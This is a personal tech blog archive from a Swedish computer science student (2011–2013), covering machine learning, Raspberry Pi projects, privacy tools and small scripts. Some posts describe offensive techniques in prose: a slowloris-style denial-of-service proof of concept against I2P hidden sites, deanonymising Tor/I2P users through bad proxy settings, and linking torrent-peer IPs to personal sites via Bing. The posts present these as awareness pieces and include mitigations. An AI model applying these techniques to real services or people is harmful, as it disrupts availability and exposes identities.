development:kejsarmakten

Similarity functions for user-based collaborative recommendations

2013-05-12T00:00:00+02:00

Similarity functions for user-based collaborative recommendations

11 May 2013

This is from my master thesis where I am writing about recommender systems.
Here are some rankscore results (ten-folds, tested on historical data, read more on evaluation in this great book) after using different similarity functions with a simple user-based collaborative filtering algorithm.
The vectors are binary or, when noted, weighted with the weight 1 / (total downloads) and based on implicit feedback (downloads).

	
		Similarity function
		 Rankscore
	
		Euclidian distance
		0.171801575012
	
		Euclidian distance (weighted)
		0.177710916698
	
		Tanimoto Coefficient
		0.129399988285
	
		Cosine similarity
		0.179036040926
	
		Cosine similarity (weighted)
		0.212398453763

Note that cosine similarity performs very well on my dataset, even though it is a user-based algorithm (rather than item-based).
I am not using Pearson correlation since my input is binary vectors.

I will publish my thesis here in June if you wish to learn more about the dataset, recommender algorithms, weighting techniques and evaluation functions.

Bayesian spam filter

2013-05-02T00:00:00+02:00

Bayesian spam filter

4 May 2013

I have forgotten to mention that I wrote a small python spam filter a while back.

It is very simple and written in Python. Mainly because I wanted to see what fields other than classic spam I could apply a spam filter as outlined by Paul Graham to.

The TOR projects needs more relays

2013-04-27T00:00:00+02:00

The TOR projects needs more relays

27 Apr 2013

A concrete way to help people living under censorship and surveillance is to set up a TOR Relay.

TOR project needs more bridges to be able to help users evade deep packet inspections and blocklists.

If you have a computer which is often running, then try installing a TOR relay on it! It is a simple and concrete way to help out.
If you do not have such a computer then you could buy a small raspberry pi and run it as relay.

If you live in Sweden you can even send it to the great people over at FS-Data which provide free colocation of raspberry pi’s (they give you free internet connection and power supply if you send in your rbp).

If you feel it is to much work setting up a TOR relay (it’s not!), or you are otherwise unable to, then you can help out by donating to others who use the money to run relays; like torservers.net or noisebridge

Remember: if you run the relay as a bridge or as an internal node all TOR traffic leaving you will be encrypted so you do not have to worry about your ISP or local authorites thinking your traffic looks suspicious.

UTF-8 strings in WEKA

2013-04-20T00:00:00+02:00

UTF-8 strings in WEKA

20 Apr 2013

Working on question classification for a project course in intelligent systems I bumped in to some issues with loading UTF-8 in ARFF-files into WEKA.

Simpel solution: Switch to using XRFF format where you can explicitly declare encoding (No one like XML, I know, but desperate times call for desperate measures).

Check RSS/ATOM reader IP address

2013-04-08T00:00:00+02:00

Check RSS/ATOM reader IP address

08 Apr 2013

Since I got the news that Google Reader was closing I have moved to RSSOwl for my RSS/ATOM feed needs.

It feels really good to reclaim my data from google, but one feature I am missing is the anonymization that the google crawler provided. To reclaim some of this I am running the RSS reader over Tor (I am getting possible DNS leakage warnings from Vidalia. Have not had time to verify this yet though).
To verify that the Tor Proxy is used I created a small ATOM feeds which tells you what IP address you are accessing it from.

Feel free to use it if you like

Writing Master Thesis on recommender systems

2013-03-25T00:00:00+01:00

Writing Master Thesis on recommender systems

15 Mar 2013

I am just writing this to let you know why the blog is so silent at the moment.

Right now I am writing my Master Thesis together with Stickybit in Malmö on the super interesting subjects of Recommender systems.
This consumes most of my time right now.

Besides this I am taking part in a project course called Intelligent Systems where we are building a question classifier for a Swedish WATSON project.

So I am swamped in some amazingly fun machine learning problems right now (which makes it extra hard to focus on my exam in Signal Processing now during the Easter holidays).

I promise to provide a summary of the results on both projects when they are done.

BitStash - Privacy on Mac

2013-02-26T00:00:00+01:00

BitStash – Privacy on Mac

26 Feb 2013

So the time has come for me to release a sideproject I have been tinkering with a while: BitStash.

It is a application that runs on the JVM and lets the users, in a simple way, create/remove and open/close encrypted volumes.
It also have some log sanitation capabilites to help users cover their tracks on their mac’s.

It is currently on beta sale for only $8 here

Bitcoin and accountability

2013-01-03T00:00:00+01:00

Bitcoin and accountability

03 Jan 2013

I am back from 29c3 and I had a blast!
I just wanted to clear something up that was mentioned during an interesting talk by Eleanor Saitta and Smári McCarthy called Long live the protocoletariat! (the unedited stream can be downloaded from here).

It was just a side note in the talk but it seems to be a common misconseption, they claimed that it was not possible to hold people accountable for taxation if they where using bitcoins, and thus it was something bad. A person from the audience later asked how this differ from cash then, and got the answer along the lines (cited from memory, so please correct me if I am wrong): “With cash the State can go the store and say ‘we think you earn this much but you have not taxated for all of that so now you owe us money until you prove us wrong’. Then the store accepting cash is forced to prove that they have not earned that much money etc”. The question was cut short so we never got an answer to why this could not be done for Bitcoin.

My initial reaction is that this process would be much much easier with bitcoins than with cash, make the process even simpler for the taxating authorities. I think that maybe the speakers does not think this is the case due to lack of understanding of the bitcoin protocol. I have tried to get in touch with the speakers over Twitter but have not gotten an answer yet. So I just thought I put my theory here to get a discussion going if someone else agrees with the speakers and care to explain why.
The process of tracking what a store has earned has become alot easier with the bitcoin protocol since each node in the network has ALL the traffic data, this means that all transactions between differnet public keys are public and can be examined by anyone, even third parties. So if a store has a bitcoin adress on their website it is easy to see exactly how much that public key has earned and what public keys the payment came from and where the coins have gone since then.
The store can prove ownership of the public key if it would be needed by signing something with the private key belonging to that address.

I do not see how bitcoins would make it any harder for the taxation authorites to do their job (compared to cash), it makes the job easier.

What are your thoughs on this?

CCC: Not my department

2012-12-01T00:00:00+01:00

CCC: Not my department

01 Dec 2012

Booked and ready for CCC this year.

Let me know if you’d like to meet up or if there is some talk/workshop I shouldn’t miss.

Resizing the Raspberry Pi SD card

2012-11-28T00:00:00+01:00

Resizing the Raspberry Pi SD card

28 Nov 2012

Yesterday I finally got my raspberry pi from RS.
Due to the (very) long wait they upgraded it to a 500MB version instead of the ordered 256MB.

I also got a 4GB SD card with the OS pre-installed on. After a apt-get upgrade I noticied that I was out of diskspace. It seems that even though they ship the SD card on a 4GB SD card they have only installed the diskimage on 2GB and the rest was left unallocated. Weird.

It is rather simple to fix this if you have a Linux running computer with a SD card reader laying about. As it happens, I have just that. This is how you go about resizing the disk image.

First insert the SD card in the reader and start gparted (if you haven’t got it and you are running a debian distro simply apt-get install gparted).

REMEBER TO BE CAREFULL AND ALWAYS BACK UP YOUR DATA BEFORE PLAYING WITH GPARTED

It will look something like this (this is from the official gparted repository).

Select in the upper right list your SD card. Then you will see a list of about four rows. On of these is a ext4 file system. Right click and unmount this if your OS has mounted it already.

When this is done right click the ext4 row and press “Resize/move”. A new window will pop up. Here you can increase the size to what you desire, either by dragging the line on the right or by manual input in the boxes.

When this is done you now have to commit the changes you have made by pressing Edit in the menu and Apply All Operations.

Now you are done! Eject the SD card and insert it into your Raspberry pi and boot it up.

For inspiration on what to do with your newly bought raspberry pi I suggest that you check out my blog post were I built a automatic watering system or why not make it into a nice little svartkast?

Also note that it is possible to do this from the raspbian boot menu now, check the end of this video.

Cyanogenmod on HTC Hero

2012-11-24T00:00:00+01:00

Cyanogenmod on HTC Hero

24 Nov 2012

Today I installed Cyanogenmod on an old HTC HERO (GSM) phone I had lying about.

I followed the guide called ClockworkMod here.
It didn’t work the first time, I got an error in the last step which said “Illegal instruction /data/local/flas…” and when I tried to boot into the recovery mode I got stuck on a screen that looked like this.

Then I found this old forum thread which solved the problem for me.

For me, it was something about the flash_image binary. The one downloaded from HTC Hero Full Update wiki page was causing this. Later I’ve found different flash_image binary on CyanogenMod Flash_Image wiki, and that one worked for me. – unj

When I switched to the flash image mentioned in the post the problem went away.

Here is a link to the flash image.

Balcony gardening automatic watering system

2012-11-05T00:00:00+01:00

Balcony gardening automatic watering system

05 Nov 2012

Here is a first preview of a watering system we (my father and I) are building for my balcony garden (wormwood, sallad and tomatoes in the spring).

These two videos demo the pump that is controlled by a raspberrypi computer.
The videos are recorded with a GOPRO HERO 2.

The battery for the pump is loaded with a solar panel.

The system will, when installed on the balcony, measure the moisture in the earth by measuring the resistance between to nails stuck into the pots.
When they are dry the system will pump water from a container through a hose to the plants.

I will post updates to the project here.

Update 7/11/2012
Deployed alpha on the balcony.

Generate Teensy key codes

2012-10-19T00:00:00+02:00

Generate Teensy key codes

10 Oct 2012

I wrote a script that convert the input string from stdin to a teensy C program that output that string in a loop as an emulated keyboard device.

Why? Well, it is annoying to translate what you want to type out from the teensy to the key codes by hand, so this script translates ascii text to the keys.
Just copy the dictionary I made of the key codes if you want to tweak the translation or use it in another setting.

The script can be found and downloaded here

Proof of concept deanonymizing I2P/TOR users

2012-10-11T00:00:00+02:00

Proof of concept deanonymizing I2P/TOR users

10 Oct 2012

This has a very small attack surface, but it is designed to show you how important it is to have proper settings on your I2P/TOR browser.

I used to have these bad settings myself so I am writing to make others aware of the danger.
(This video at 4:35 shows how I had it set up when it was vunerable)

Note how I use regex to chose the proxy settings. This allows for an attacker to trick my browser to call a server outside of the I2P network.

If this shows your normal IP address and not the TOR/I2P (localhost) then you must review your proxysettings!

Here is a image of me accessing the I2P version of this blog with bad proxy settings.

Weka out of memory crash on OS X

2012-09-26T00:00:00+02:00

Weka out of memory crash on OS X

26 Sep 2012

Using some bigger dataset makes the machine learning program Weka crash due to lack of memory.

To increase the memory limit Weka is allowed to use before it crashes edit the file

/Applications/weka-3-7-5.app/Contentsi/Info.plist

(for the version number you have on your Weka install)

Change the line

<string>-Xmx256M</string>

<string>-Xmx2g</string>

The 2g means that it allows Weka to use 2GB memory, you can change this to what best suits you.

Layer 7 DOS against I2P darknet

2012-09-11T00:00:00+02:00

Layer 7 DOS against I2P darknet

11 Sept 2012

Download here

I wrote a small proof of concept in python for a slowloris attack performed against hidden sites on the I2P darknet.

The idea comes from the Slowloris attack where the attacker depletes the web servers resourses by initiating a few very slow request, filling up the sockets and rendering the site unaccesable.

Since the attack works on layer 7 (sending partial GET requests), it works very well over darknets like TOR or I2P.

One way to protect against against the Slowloris attack is to limit the time a client is allowed to stay connected, but this proves hard in a high latency enviroment like the I2P darknet.

How does it work

First I open a socks proxy in my I2P configurations on port 4475.

Then I run the script with the host (change the host variable to i.e. the base32 address) I want to take down.

>python darkloris.py

Before script is fired.

After script is fired.

Please remember that Denial of Service-attacks are illegal. Only use this script when trying to secure your own eepsite against this kind of attacks.
A good tip is to lower the amount of connections one IP is allowed to have to your site at a given moment.

Update

As the goog people at forum.i2p pointed out there are good protections against this attack built in to the i2p routing software. It is not activated by default but you can find it on the advanced settings for the server tunnel.

In the advanced panel you can limit the amount of incoming connections from one client per minute/hour/day. Here is a screen dump of the settings (but unfortunately in Swedish).

This fall (Maximum warp!)

2012-08-31T00:00:00+02:00

This fall (Maximum warp!)

31 Aug 2012

Last year on my masters program starts on monday. Looking forward to a highly interesting year!
First I will kickstart the term with 150 % fulltime study (how can I remove one of these Advanced Algroithms, Advanced Computer Security and Language technology ?).

Hopefully I will begin writing my master thesis during the fall as well, if I can find an interesting project. (Please drop me an email if you have any suggestions!)

I am also moving away from my beloved Lund to Malmö in September.

Besides this I am planning on improving my skills in Scala and maybe organising a cryptoparty in Lund.

Maximum warp, punch it!

Copyright trolling

2012-08-21T00:00:00+02:00

Copyright trolling

21 Aug 2012

Security Researchers are often swapping malware code to help each other analyse threats.

With our current innovation impeding copyright laws, doesn’t this constitute copy right infringement?
If I would write something that looks like a malware, and it is passed around (publicly on twitter!), would the Rättighetsalliansen help me collect?

I mean, otherwise people might stop innovating!?

The killer in the Song of Joy

2012-08-03T00:00:00+02:00

The killer in the Song of Joy

03 Aug 2012

Just to clear up any questionmarks regarding the song of joy by Nick Cave;

The singer is the killer

How do we know?

They never caught the man
He's still on the loose
It seems he has done many many more
Quotes john milton on the walls in the victim's blood
The police are investigating at tremendous cost
In my house he wrote 'his red right hand'
*That, I'm told is from paradise lost*

Note the last line.

the sun to me is dark
and silent as the moon

This part is a quote from John Miltons Samson Agonistes.

Make it pixly!

2012-08-01T00:00:00+02:00

Make it pixly!

01 Aug 2012

Just a quick note.

I wanted to play around a little with the excelent Python Image Library so I wrote a small flask script that transforms a picture into pixelart. Nothing fancy. But make sure to check out PIL and if you want to try it out, go ahead (jpg + png only).

Bokus eller Adlibris

2012-08-01T00:00:00+02:00

Bokus eller Adlibris

09 Jul 2012

Ett mindre hack jag skrev ihop för att döda tid när jag väntade på diskkryptering.

Eftersom jag har ett omättligt sug efter bra litteratur så spenderar jag stora delar av mitt CSN på att inhandla böcker.
När jag ser en bok jag vill köpa är alltid den eviga frågan skall jag köpa den på bokus eller adlibris?
De två stora internetbokhandlarna brukar variera några kronor i pris mellan varandra, men vilken som är billigast varierar mellan titlarna.

För att snabbt kunna verifiera detta (då bokfynd.nu inte stödjer sökningar mot bokus) så skrev jag ihop ett snabbt litet hack.

Vill ni testa hostas den här

The Monty Hall problem emulation

2012-07-09T00:00:00+02:00

The Monty Hall problem emulation

09 Jul 2012

Since I first heard of the Monty Hall problem it has been itching my intellect.
If you haven’t heard of the problem there is a good explanation of it over on wikipedia.

The idea is that you are on a game show, where there are three doors. You will get to keep whatever is behind the door you choose.
Behind one of them there is a car, and behind the other two there are donkeys.
First you will get to choose a door, but you can not see what is behind it.
After this the host will open another door, behind which he will reveal a donkey.

You are now left with a choice, stay with the door you choose from the beginning or change to the door that the host didn’t open.

Will the change of door increase or decrease your chance of getting the car?

Intuitively I would not think that there would be a difference, but according to wikipedia, and my maths lecturer there will be. If you switch door there is a greater change (2/3) of winning the car, than if you stay(1/3). This seems a bit strange to me so I naturally decided to write up a small script to get some statistics on it.

The script can be found on my gist page on github.

The best part? You call it with

python Monty.py

Theory seems to win over intuition again.

>python Monty.py 
Run game. Change everytime. 10000000 iterations.
Wins: 6667411 Loses: 3332589
Run game. Never change. 10000000 iterations.
Wins: 3335638 Loses: 6664362

Setting up a web store

2012-06-14T00:00:00+02:00

Setting up a web store

14 Jun 2012

I helped my girlfriend to set up her web store a few days ago (she makes and sells bowties, check it out).
It was made really simple by a nice web service I found called tictail, “the tumblr for e-commerce”.

With a really simple interface you can choose one of several nice themes (which you can later modify in a neat little online editor), and then add your products without much fuzz.
For payments you use either PayPal or Klarna (we tried out PayPal first and it was just a few clicks to get going).

Best of all? – It is free.
Their buissnes model is based on celling addons for the service (to enable discount codes and such).

[Ej längre] Söker examensarbete i Datavetenskap [Looking for CS master thesis]

2012-04-28T00:00:00+02:00

[Ej längre] Söker examensarbete i Datavetenskap [Looking for CS master thesis]

28 Apr 2012

Update
Söker ej något examensarbete längre då jag har hittat ett mycket intressant arbete tillsammans med Stickybit i Malmö!

Old post
Nästa höst börjar mitt sista år på civilingenjörsprogrammet i Datateknik på Lunds Tekniska Högskola (LTH).
Detta innebär att det är tid för mig att börja söka efter ett examensarbete.
Examensarbetena är 30 HP (motsvarar en termins heltidsstudier) avancerade poäng.

Som det ser ut nu skulle jag gärna göra ett examensarbete inom artificiell intelligens, maskininlärning eller informationsinhämtning, då dessa tre ämnena ligger mig varmt om hjärtat.

Gärna i Öresundsregionen (Lund, Malmö, Helsingborg eller Köpenhamn) men jag är öppen för förslag på andra orter med.

Har du några förslag på idéer på exjobb så skicka mig gärna ett mail (christopher.kack [a] gmail.com) eller lämna en kommentar nedan.
Både intressanta företag och projektidéer som kan utföras på institutionen uppskattas.

English summary
Next year is my last year on my masters degree in computer science at the University of Lund (LTH).
This means that I will be doing some kind of advanced work for 30 HP (1 term of full time studies).
I have yet to decide what to work on though.

Right now I would prefer working with something concerning Artificial Intelligence, Machine Learning or Information Retrieval.

If anyone has any ideas for good projects please send me an email to christopher.kack [a] gmail.com or leave a comment below, it would be very appreciated.

Robot friends

2012-04-27T00:00:00+02:00

Robot friends

27 Apr 2012

I’ve bumped in to some interesting small robots for home use.
I really, really, really want to get my hands on one of these little critters.

First up is the Open Source Qbo.

I also bumped into Nao.

Do you know any more small robots belonging in this list? Please comment below!

It would be lovley to have one of these running around at home to keep me, my girlfriend and our pug company. It gives a whole new perspective to network security though. Would not be very nice to have an agent walking about the house rooted by an attacker (stuff horror movies are made of).

Nice to see that both are produced in Europe!

Compare to the American robot below ;)

Update
There is so much robot awesomeness out there.

The face of Watson

2012-04-27T00:00:00+02:00

The face of Watson

27 Apr 2012

We had IBM dropping by LTH today to hold a short presentation of their AI project Watson.
It was a short 45 minute speach so they did not have time to go in to any depth, but luckily we have disscussed Watson in our Applied Artificial Intelligence course.
One of the speakers recommended us to check out the video on the design of Watsons interface.
I found this inspiring video and felt like sharing it.

Berlin Books

2012-04-07T00:00:00+02:00

Berlin Books

07 Apr 2012

For the Readmill hackathon I and Carl Ekerot wrote a small book recommendation webapp.

What it does is that it compares your facebook book related likes (authors, books and so on) to your friends, and then it finds the friends which you have the most similar taste to and recommends some books that you haven’t read (read “liked”) from them.
We mostly wrote it because we wanted to play around with recommendation systems a little, but a fever put a stop to our hacking rather early in the night so this basic solution was what we had time for.
We are still thinking about adding some improvements, we’ll see how it goes!

It is still a hack and lacks logout button and other necessities, but we put it up on Heroku if you want to check it out!. Please report back any bugs you find to us either here or on twitter.

Readmill hackathon

2012-04-03T00:00:00+02:00

Readmill hackathon

04 Apr 2012

Spent the weekend on the Readmill hackathon with Carl Ekerot.
We both had a blast and wrote a book recommendations system connected to facebook. It goes under the workname Berlin Books and we are now porting it over to heroku so you can try it out!

Update See the result here

Dropping some pictures from the trip. Oh, how I love Berlin.

Functional hack time lapse

2012-02-08T00:00:00+01:00

Functional hack time lapse

08 Feb 2012

A time lapse of me and kd35a working on a all night coding session before a deadline in our functional programming course.

(The time lapse only cover a few hours until the battery died on my GOPRO Hero).

IP keyword in Bing.com

2012-02-02T00:00:00+01:00

IP keyword in Bing.com

02 Feb 2012

I found something in Bing.com today that I found quite interesting (:O yes I know!).

There is a search keyword called ip, which returns all sites known to Bing that are hosted on that IP.

With the help of this I managed to indentify and connect serveral IP addresses, from my torrent client, to personal websites.
Normally people tend to feel that they are safe from indentification when they share IP with their webserver if they just tell the webserver not to respont to requests through the IP address and restrict it to access through the domain name.

I wrote a small script to wrap the Bing.com API, here is the enpoint

http://links.kejsarmakten.se/ip/index.php?ip=[IP HERE]

Example usage

curl http://links.kejsarmakten.se/ip/index.php?ip=8.8.8.8

Update
It seems bing has changed their API and my wrapper no longer works.

Flattr Video Browser

2012-02-02T00:00:00+01:00

Flattr Video Browser

02 Feb 2012

The Flattr Video Browser is a Python project I wrote for the Flattr API challenge

The Flattr Video Browser

The project combines the Flattr API with the power of OEmbed and allows you to browse trending videos on Flattr.
For more infromation go to the about page (it also contains a picture of me posing with my pug).

Akta för ACTA

2012-01-26T00:00:00+01:00

Akta för ACTA

26 Jan 2012

Well, the Americans just won their first small battle against the IP-mafia.
Now it is Europes turn, ACTA is about to be signed.

In Poland there is 15.000 people protesting on the streets.
Let us follow their good example.

Learn You a Haskell for Great Good

2011-12-18T00:00:00+01:00

Learn You a Haskell for Great Good

18 Dec 2011

On monday is my exam in functional programming and I wanted to round of the course with a short note on my course littrature.

Well, it is not really THE course litterature, but the course does not follow a particular book really closely.
So I choose to go with this book (got hold of a copy through a Hacker News sale) and Oh am I glad I did.

It is written by a slovenian Computer Scientist named Miran Lipovača. Miran has a wonderful sense of humor and is a great teacher. The book is a wonderful read and the mixture of humor and an understanding for the hard parts in Haskell makes it a fun way to learn the language (unlike most course litterature I have stumbled across so far).

And yeah, did I mention it is FREE to read online?

Android 4 security improvements

2011-12-16T00:00:00+01:00

Android 4 security improvements

16 Dec 2011

Just got my Galaxy Nexus phone with a clean Android 4 install.
Here are some quick initial reactions:
There seem to be two new security features (compared to my old HTC Hero with Android 1.6) that I just noticed.

Seems like it supports some sort of disc encryption!

Also, you can choose what CA’s to trust! Choose whom to trust!

Great news everyone!

Update 17/12/2011
I am having a few concerns regarding the encryption introduced. I have started a disscustion around it on the android stackexchange, feel free to contribute with your thoughts.
The encryption forces the use of the same password/PIN for the screen unlock as for the decryption. Thus discouraging the use of secure passwords or passphrases (hands up, who wants to write a 17 mixed case letter and digit password on the onscreen keyboard, everytime you want to check your phone or send a text messsage?).

I tried to encrypt my phone last night and it seem to have crashed in the middle of the encryption. Claiming it was aborted (I left it alone connected to a charger), and in need a factory reset. Rather annoying, even though the second try was successful. So beware that this might happen if you encrypt your phone.

Javascript GPG: Protect your webmail

2011-11-25T00:00:00+01:00

Javascript GPG: Protect your webmail

25 Nov 2011

I just tried out GPG4Browsers in Google Chrome.
It is a Javascript implementation of OpenGPG (only missing key generation).

It is really easy to install in Chrome, just follow the steps on the website.
At the moment the plugin only seems to work with Gmail and in Chrome, but hopefully this will change soon and both Firefox plugins and support for other webclients like Roundcube will be available (the hard part, writing the Javascript OpenGPG implementation, is done so now its just a matter of packaging).

The Chrome plugin adds a little button in the adress field when you log in to Gmail that enables you to create a new encrypted message (and import keys from the keyserver of your choice and such).

It also detects if a message seems to be encrypted with PGP and ask you if you want to decrypt it.

So… what does this mean?
Well, it means that you can have encrypted conversations with people.

This will stop Gmail from analyzing your emails and sending you directed ads.
This will stop snooping people in your surrondings (at work, in school or whereever) from reading your email.
This will stop people from being able to read your email if they get hold of your email password or your email server is hacked (they would also need your private key and your passphrase to the key)
This will also protect the email from eavesdropping (if the person you email, or his email provider, doesn’t use propper TLS/properly encrypted wifi and so on).

NOTE: I have not reviewed the source code.

Note 1: The Chrome plugin opens a new window to encrypt and decrypt emails, hopefully this stops other javascripts to get hold of the clear text version of the email.

Note 2: I recently read on #cryptodotis that it is probable that the signing with DSA keys is broken with this plugin since the Random Number Generator in javascript is bad. This can be avoided with good implementation though, but it has not been confirmed for this project. Thus I recommend avoid signing with DSA keys with this implementation unless you first audit the code.

Wallpapers automatically from Tumblr

2011-11-23T00:00:00+01:00

Wallpapers automatically from Tumblr

23 Nov 2011

Last night I wrote a small script that updates my background images daily to those from one of my favorite tumblr’s (thanks Well dressed for the apaocalypse!).
Feel free to try it out. To do so you need to install Feedparser and Beautifulsoup (or just download them and put them in the same folder as the script).
Here is the Python script, it is hosted on Github if you want to fork it.
Put the script in

/etc/periodic/daily/

to get it to upgrade your backgrounds daily.

Do not forget to change the path variable in the script to your wallpaper folder where you store your background images.

This is on OS X but the script should work on i.e. Linux to if you have installed automatical wallpaper switcher (create a crob job instead of the periodic folder).

Right now it only supports one blog, but if you care to collect pictures from more it is just a minor fix to the Python code. You can change what Tumblr it reads from by changing the tumblr_url variable.

Any questions? Drop a comment!

Myrmidonian Artifical Intelligence

2011-11-16T00:00:00+01:00

Myrmidonian Artifical Intelligence

16 Nov 2011

Our, obvoiusly mildly sadistic, leacturer in Functional Programming decided it was a good idea to show us a few live games of Googles AI challenge before a lecture to distract us from our studies and other tasks at hand.
Having considered buying a PS3 or xbox, for a few days, to play Skyrim just to experience the Dragon AI first hand, it was a given that I would give the challange a go.
Buried under heavy workload I have not been able to give it a crack before today.

I just uploaded my first first code (after completing the tutorial) and could with fatherly love see my small Myrmidons win their first game!

I’ll update here as I add improvements. Any one else reading this participating? I’d love to grab a beer/coffie and discuss tactics.

Update – The sinus dance

Alright, first lines of code added and my little bots have played their first match.
Victory again! My brave little warriors decided eating and copulating was their thing so it didn’t take long until the map was covered with Myrmidons.
This they then decidied to celebrate with a syncronized sinus curve dance.

Update – Bitter defeat

Alas, crushing defeat. Blindend by hybris my brave soldiers decided they would begin this game by sinus dancing (see above).
But, we’ll learn for our misstakes. Just look at this population!

I WANT THAT! She moves in unison like spartans, a flock of birds or fish.
She is defeated by this black magic though:

Some kind of awesome celtic cross. Is celtic black magic cross what I really want?
Back to the drawing table!

Gittes tygkälla

2011-11-11T00:00:00+01:00

Gittes tygkälla

11 Nov 2011

A scary place

Blekingska nationens sångboksapp

2011-10-25T00:00:00+02:00

Blekingska nationens sångboksapp

25 Oct 2011

Igår natt så gick vi live med Androidapplikation som jag har arbetat endel med, men som Fredrik Strandin är initiativtagare till. Applikationen är en digital sångbok, så att man slipper glömma ta med sig sångboken till sittningar i framtiden.

Jag har snickrat ihop en liten sida åt projektet här och här finns källkoden på GitHub och här är applikationen på android market.

Här är en video där jag demonstrerar applikationen lite snabbt.

Titta på projektsidan för att se hur man skall göra för att lägga till egna sångböcker.

Programming with Spock

2011-10-23T00:00:00+02:00

Programming with Spock

23 Oct 2011

Installing the Glasgow Haskell Compiler right now.
On monday I begin studing Functional Programming (Haskell) and cryptography on LTH.
Dead excited. So hopefully there will show up a few Haskell related posts here in the near future.

Do NOT trust the server

2011-10-20T00:00:00+02:00

Do NOT trust the server

20 Oct 2011

I have sometimes stumbled across the comment in privacy aware IRC channels and forums that “if you do not trust the server, change server”.
I do not agree with this, I think that it is important that you should never trust the server if you are handling sensitive information.

Always try to use protocols that protect you End-to-End to avoid the need of server trust.
Most communication protocols do not support this i.e. Jabber where all traffic is tunnelled through the server (please correct me if I am wrong), Skype (i.e. decrypting traffic for China), E-mail and so on.
There are patches and ways to avoid this though i.e PGP and OTR (weak against MitM-attacks).

If a protocol requires you to rely on a server for protection then expect that data to leak. The server provider WILL loose your password in clear text, loose logs or decrypt your messages for governments, employes, hackers or anyone else who cares to listen.

Numerous examples of companies who ask you to trust them for anonymity or security has been proven flawed. Examples are Hushmail and Hide My Ass.
The problem is that the reaction often is surprisingly small from the public and the users. If companies like these can doesn’t protect you, what role do they then serve? It is all pseudo-safety.

Server trust is a big problem with anonymous VPN providers, they live of your trust. If you do not trust them not to hand out information or log then they are useless. In this case it is hard to avoid the trust relationship (if you do not use TOR or I2P but watch out for exit node on these darknets, you have the same problem there as with the VPN providers. Use hidden services (eepsites), or TLS connections if visiting vanilla internet).

Create and send torrent via OS X terminal

2011-10-18T00:00:00+02:00

Create and send torrent via OS X terminal

18 Oct 2011

Why?

Sending a big file to a friend is sometimes tricky.
Therefore I wrote a small bashscript that creates a .torrent file of the file I want to send.
After that it opens it in the torrent client of my choice and finally creates a new email and attaches the torrent file to it.
The only thing left for me to do after this is to send the email to the person I want to share my file with!

How?

First of all it has a dependency called pyscope it can be installed with ‘easy_install pyscope’.
Next I put this code in my ~/.bash_profile

function createtorrent() {
	FILENAME=$1
	mktor -p $FILENAME udp://tracker.openbittorrent.com:80/announce
	open $FILENAME.torrent
	echo "tell application \"Mail\"
	 activate
	 set MyEmail to make new outgoing message with properties {visible:true, content:\"Torrent file transfer    \"}
	 tell MyEmail
	   make new attachment with properties {file name:((\"$FILENAME.torrent\" as POSIX file) as alias)}
	 end tell
	end tell
	" | osascript
}

Now it can be executed with

createtorrent fileIwantToSend.avi

Convergence

2011-10-11T00:00:00+02:00

Convergence

11 Oct 2011

Just finished watching this speech from BlackHat on weaknesses in SSL and the CA authority model.
I have also begun trying out the Convergence software mentioned in the video.
Here are some extra Convergence notaries of you want to try it out on the crypto.is project

Backup mySQL with BASH

2011-10-10T00:00:00+02:00

Backup mySQL with BASH

10 Oct 2011

Simple BASH script to backup mySQL database and save it encrypted

#!/bin/bash
DATE=$(date +%s)
BACKUPFILEZ=/backup/dump${DATE}.sql
mysqldump -u root --all-databases --hex-blob --complete-insert -p > backup.sql > $BACKUPFILEZ
gpg --encrypt $BACKUPFILEZ
rm $BACKUPFILEZ

Note: This script stil needs you to manually enter database password and what public key to use for encryption (this can easily be added to the script). Also I recommend that you save the backups externally (and not in “/backup”), and for this I would recommend “scp”.

Trying out Piwik

2011-10-09T00:00:00+02:00

Trying out Piwik

09 Oct 2011

I decided to try out Piwik for my blog, in an attempt to “reclaim my data”.
It is an Open Source (GPL) alternative to Google Analytics. I haven’t removed the GA script from the blog just yet until I know it is working properly.

So far it seems to work really well with a beautiful interface and it doesn’t seem to lack in functionality either, I’ll report back here when I have been using it more.

Write every day!

2011-10-04T00:00:00+02:00

Write every day!

22 Jul 2011

Unable to sleep well last night I put together this website with the aim to help inspire people to write every day.

What should I write about today

The concept is simple, the page randomly selects a one sentence plot from my database and suggests it as an idea on what to write about.
For more info about the idea I recommend the about page.

Transmission-bt feature request

2011-10-03T00:00:00+02:00

Transmission-bt feature request

03 Oct 2011

Two feature requests for the bittorrent client Transmission:

Support for proxies! I want to be able to connect my torrent program to a SOCKS proxy!
Make it possible to select single torrents to use DHT and PEX and not activate it for all of them. Most private trackers ban the use of DHT and PEX and most public trackers rely on them beeing there. It is rather annoyning to have to use seperate torrent clients for public and private trackers.
Just noticied that the last one is supported through the privacy flag on torrent files.

And before I end this blog post I also want to recommend the transmission remote GUI. A great way to run your tranmission on a server and stil use it integrated on your normal computer, without having trouble with P2P-blocking networks and battery drainage on laptops.

Crescent 1948 Valkenburg

2011-09-29T00:00:00+02:00

Crescent 1948 Valkenburg

29 Sept 2011

My latest love affair. A Crescent 1948 Valkenburg .

Now I just have to buy some new lights and a couple of reflexes to be left alone by the notoriously tenacious Lund police. Any recommendations, please leave a comment below?

Leaving for Germany

2011-09-03T00:00:00+02:00

Leaving for Germany

3 Sept 2011

Leaving for Germany tomorrow. First Hamburg (St Pauli) and then of to Heidelberg and Berlin, and probably a few more stops.
I’ll be gone for about three or four weeks, it is all very loosly planned. If you care to grab a beer and talk about programming, politics, Flattr or whatever, drop me an email.

Thank you Flattr, it has been a great summer!

2011-08-27T00:00:00+02:00

Thank you Flattr, it has been a great summer!

27 Aug 2011

Well, thats it for now. This Wednesday is my last day at Flattr in Malmö. I’ve worked there since June and spent the entire summer in the sweetest software development office ever!
It makes me quite emotional writing this because it will be really hard leaving all the great people at Flattr to continue my studies on a Master in Computer Science.

It has been such a wonderful experience being a part of the phenomenon that is Flattr. Working on a team set out to improve the world. The atmosphere in the Flattr office is a really inspiring and unique. With an unhieractical structure and relaxed attitude creativity is flourishing and I really felt included in the company and the debates on the future of Flattr.

The software development environment is really creative and open and a thirst for knowledge drives the team. If I would ever put together a development team the atmosphere in the Flattr office is the one I would strive for. The sense of trust in you and the amount of freedom given really maximize productivity and all the helpful devs makes it one hell of a team.

Thanks for the laughs, jokes, critique, discussions, gaming, Club Mate, coffee, beer, Lego, board gaming, all the ‘awesome’ and thanks for your trust in me and my ability.
I hope I will be back one day!

Tack Linus, Peter, Simon, Joel, Leif, Per, Pelle, Maria, Niklas, Josef och Marie. Ni har verkligen gjort det här till en riktigt fin sommar som jag kommer minnas med glädje.

Here are some pictures from the office this summer.

Pair (bro-)programming with Per in the Fatboys while Josef and Pelle builds lego/perls

